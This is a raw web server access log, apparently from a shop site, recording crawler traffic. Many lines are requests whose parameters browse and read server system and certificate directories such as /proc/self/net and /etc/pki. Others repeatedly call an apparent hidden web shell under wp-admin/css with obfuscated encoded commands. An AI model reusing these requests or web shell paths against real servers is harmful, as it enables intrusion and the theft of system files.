74.7.227.128 - - [06/Nov/2025:02:04:40 +0700] "GET /shopbrand1093571503?path=//usr/lib64/gtk-2.0/2.10.0/immodules HTTP/2" 200 2570 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:46 +0700] "GET /shopbrand1093571503?path=//usr/lib64/gtk-2.0/2.10.0/filesystems HTTP/2" 200 2573 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:49 +0700] "GET /shopbrand1093555954?fileloc=//lib64/libpthread.so&path=//lib64 HTTP/2" 200 2607 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:53 +0700] "GET /shopbrand1093555954?path=//lib64/gdk-pixbuf-2.0/2.10.0 HTTP/2" 200 2904 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:04:59 +0700] "GET /shopbrand1093657736?path=//proc/self/net HTTP/2" 200 3058 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:03:00 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323938302p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393338302q3931313132366231383538656336333937393166386635393666313866373965222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:05:03 +0700] "GET /shopbrand1093762447?path=//lib/jvm/jre-1.8.0 HTTP/2" 200 3068 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:05:09 +0700] "GET /shopbrand1093604023?path=//proc/self/net HTTP/2" 200 3023 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:05:13 +0700] "GET /shopbrand1093488824?path=//etc/snmp HTTP/2" 200 2842 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:05:19 +0700] "GET /shopbrand1093762447?path=//proc/self/net HTTP/2" 200 3058 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:03:22 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333030322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393430322q6335643431376633393066383162396166633830646430383161303038326534222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:05:23 +0700] "GET /shopbrand1093555954?path=//lib64/gdk-pixbuf-2.0/2.10.0/loaders HTTP/2" 200 3303 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:05:29 +0700] "GET /shopbrand1093762447?path=//var/lib/net-snmp/cert_indexes HTTP/2" 200 2561 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:05:33 +0700] "GET /shopbrand1093762447?path=//var/lib/net-snmp/mib_indexes HTTP/2" 200 2821 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:05:40 +0700] "GET /shopbrand1093604023?fileloc=//proc/self/net/udp&path=//proc/self/net HTTP/2" 200 2781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:05:43 +0700] "GET /shopbrand1093762447?fileloc=//proc/self/net/raw&path=//proc/self/net HTTP/2" 200 2621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:03:44 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333032342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393432342q3565343338373130613230636466353462363161366234643933343066613561222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:05:50 +0700] "GET /shopbrand1093555954?fileloc=//lib64/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-xbm.so&path=//lib64/gdk-pixbuf-2.0/2.10.0/loaders HTTP/2" 200 8085 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:05:54 +0700] "GET /shopbrand1093555954?fileloc=//lib64/gdk-pixbuf-2.0/2.10.0/loaders/libpixbufloader-jasper.so&path=//lib64/gdk-pixbuf-2.0/2.10.0/loaders HTTP/2" 200 7157 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:01 +0700] "GET /shopbrand1093604023?fileloc=//proc/self/net/raw&path=//proc/self/net HTTP/2" 200 2621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:04 +0700] "GET /shopbrand1093762447?fileloc=//proc/self/net/tcp&path=//proc/self/net HTTP/2" 200 7993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:04:06 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333034362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393434362q6463373962346234363437623030303336313161336630336366643931386638222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
66.249.73.72 - - [06/Nov/2025:02:06:10 +0700] "GET /shopbrand34883060?kg=0034807522 HTTP/1.1" 200 24764 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:02:06:11 +0700] "GET /shopbrand1093657736?fileloc=//proc/self/net/udp&path=//proc/self/net HTTP/2" 200 2781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:15 +0700] "GET /shopbrand1093762447?fileloc=//proc/self/net/udp&path=//proc/self/net HTTP/2" 200 2781 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:21 +0700] "GET /shopbrand1093657736?fileloc=//proc/self/net/unix&path=//proc/self/net HTTP/2" 200 6513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:25 +0700] "GET /shopbrand1093604023?fileloc=//proc/self/net/unix&path=//proc/self/net HTTP/2" 200 6530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:04:28 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333036382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393436382q3866346237636336333164303837303331633962303836336134363934346666222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:06:31 +0700] "GET /shopbrand1093762447?fileloc=//proc/self/net/unix&path=//proc/self/net HTTP/2" 200 6459 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:35 +0700] "GET /shopbrand1093762447?fileloc=//proc/self/net/udp6&path=//proc/self/net HTTP/2" 200 2667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:39 +0700] "GET /shopbrand1093762447?fileloc=//proc/self/net/raw6&path=//proc/self/net HTTP/2" 200 2565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:44 +0700] "GET /shopbrand1093604023?fileloc=//proc/self/net/raw6&path=//proc/self/net HTTP/2" 200 2565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:48 +0700] "GET /shopbrand1093657736?fileloc=//proc/self/net/raw6&path=//proc/self/net HTTP/2" 200 2565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.14.64 - - [06/Nov/2025:02:06:51 +0700] "GET /shopbrand1137458386?kg=1134980722 HTTP/2" 200 62523 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
103.7.226.137 - - [06/Nov/2025:02:04:51 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333039312p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393439312q6337663062643333366163396536613538636638623764643536333934383264222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:06:53 +0700] "GET /shopbrand1093555954?path=//lib64/ImageMagick-6.9.10/modules-Q16 HTTP/2" 200 2847 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:06:57 +0700] "GET /shopbrand1093657736?fileloc=//proc/self/net/tcp6&path=//proc/self/net HTTP/2" 200 3085 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:07:03 +0700] "GET /shopbrand1093604023?fileloc=//proc/self/net/tcp6&path=//proc/self/net HTTP/2" 200 3094 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.71.3 - - [06/Nov/2025:02:07:03 +0700] "GET /?shopbrand561707290?kg=0560483986 HTTP/1.1" 200 27111 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:02:07:07 +0700] "GET /shopbrand1093657736?fileloc=//proc/self/net/udp6&path=//proc/self/net HTTP/2" 200 2667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:07:10 +0700] "GET /shopbrand1093762447?fileloc=//proc/self/net/tcp6&path=//proc/self/net HTTP/2" 200 3075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:05:13 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333131332p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393531332q6135343330366433653238386337313064393438666564323335333562343536222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:07:16 +0700] "GET /shopbrand1093604023?fileloc=//proc/self/net/udp6&path=//proc/self/net HTTP/2" 200 2667 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:07:23 +0700] "GET /shopbrand1093604023?fileloc=//proc/self/net/dev&path=//proc/self/net HTTP/2" 200 2709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:01:09 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323836392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393236392q6638323131383466313939343935633062323162313032623262306430346537222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
103.7.226.137 - - [06/Nov/2025:02:01:32 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323839322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393239322q6438366636613435343731373162636362393961613961396435313566366430222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
103.7.226.137 - - [06/Nov/2025:02:01:54 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323931342p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393331342q3031373065313364666337303965313239613432323735393231313736663766222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
103.7.226.137 - - [06/Nov/2025:02:02:16 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323933362p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393333362q3763393532346664636531613861303236316539393434393638636232376166222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
103.7.226.137 - - [06/Nov/2025:02:02:38 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337323935382p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393335382q3039326330376461656133363939396132373964303430663965356363323934222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:07:27 +0700] "GET /shopbrand1093762447?fileloc=//proc/self/net/dev&path=//proc/self/net HTTP/2" 200 2709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:07:30 +0700] "GET /shopbrand1093657736?fileloc=//proc/self/net/dev&path=//proc/self/net HTTP/2" 200 2709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:05:35 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333133352p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393533352q3061353165303366666533633534303364303633346635663738363936336661222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:07:36 +0700] "GET /shopbrand1093555954?path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 8768 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:07:43 +0700] "GET /shopbrand1093762447?fileloc=//var/lib/net-snmp/mib_indexes/0&path=//var/lib/net-snmp/mib_indexes HTTP/2" 200 3229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:07:47 +0700] "GET /shopbrand1093555954?path=//lib64/ImageMagick-6.9.10/modules-Q16/filters HTTP/2" 200 2874 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:07:50 +0700] "GET /shopbrand1093488824?path=//etc/default HTTP/2" 200 2871 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:07:55 +0700] "GET /shopbrand1093604023?path=//etc/cxs HTTP/2" 200 2526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:05:57 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333135372p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393535372q3330326562393366373065633464656364653264343139343033333032363633222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:08:02 +0700] "GET /shopbrand1093604023?path=//etc/pki HTTP/2" 200 3061 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.73.71 - - [06/Nov/2025:02:08:05 +0700] "GET /shopbrand547329635?kg=0546137654 HTTP/1.1" 200 26036 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.128 - - [06/Nov/2025:02:08:06 +0700] "GET /shopbrand1093555954?fileloc=//lib64/ImageMagick-6.9.10/modules-Q16/coders/pdb.la&path=//lib64/ImageMagick-6.9.10/modules-Q16/coders HTTP/2" 200 3045 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:08:13 +0700] "GET /shopbrand1093657736?path=//lib/kbd HTTP/2" 200 2841 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:08:16 +0700] "GET /shopbrand1093707564?path=//usr/bin HTTP/2" 200 17558 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:06:19 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333137392p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393537392q3932616137636335333235356433383662356230656333393263643465373732222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:08:22 +0700] "GET /shopbrand1093657736?path=//etc/scl HTTP/2" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:08:27 +0700] "GET /shopbrand1093571503?path=//lib/gcc HTTP/2" 200 2788 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:08:31 +0700] "GET /shopbrand1093657736?path=//etc/rpm HTTP/2" 200 3001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:08:33 +0700] "GET /shopbrand1093604023?path=//etc/pki/CA HTTP/2" 200 2846 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.128 - - [06/Nov/2025:02:08:40 +0700] "GET /shopbrand1093657736?path=//etc/ssl HTTP/2" 200 2777 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
103.7.226.137 - - [06/Nov/2025:02:06:42 +0700] "GET /wp-admin/css/colors/colors/index.php?ARRAY=7o2230223n313736323337333230322p2231223n22687474703n5p2s5p2s7n733630347631336o6s2r63686566742r696r666s5p2s3s6p633q7068705s636s64655s6n6326743q313736323336393630322q3036303863306630633462336632336636653639343934386532636263643137222p2232223n223637623432633465643634363966396330623361366533323266653631323335222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34312q35352q36372q37382q38332q3136227q HTTP/1.1" 500 296 "-" "-"
74.7.227.128 - - [06/Nov/2025:02:08:44 +0700] "GET /shopbrand1093707564?fileloc=//usr/bin/createuser&path=//usr/bin HTTP/2" 200 24345 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
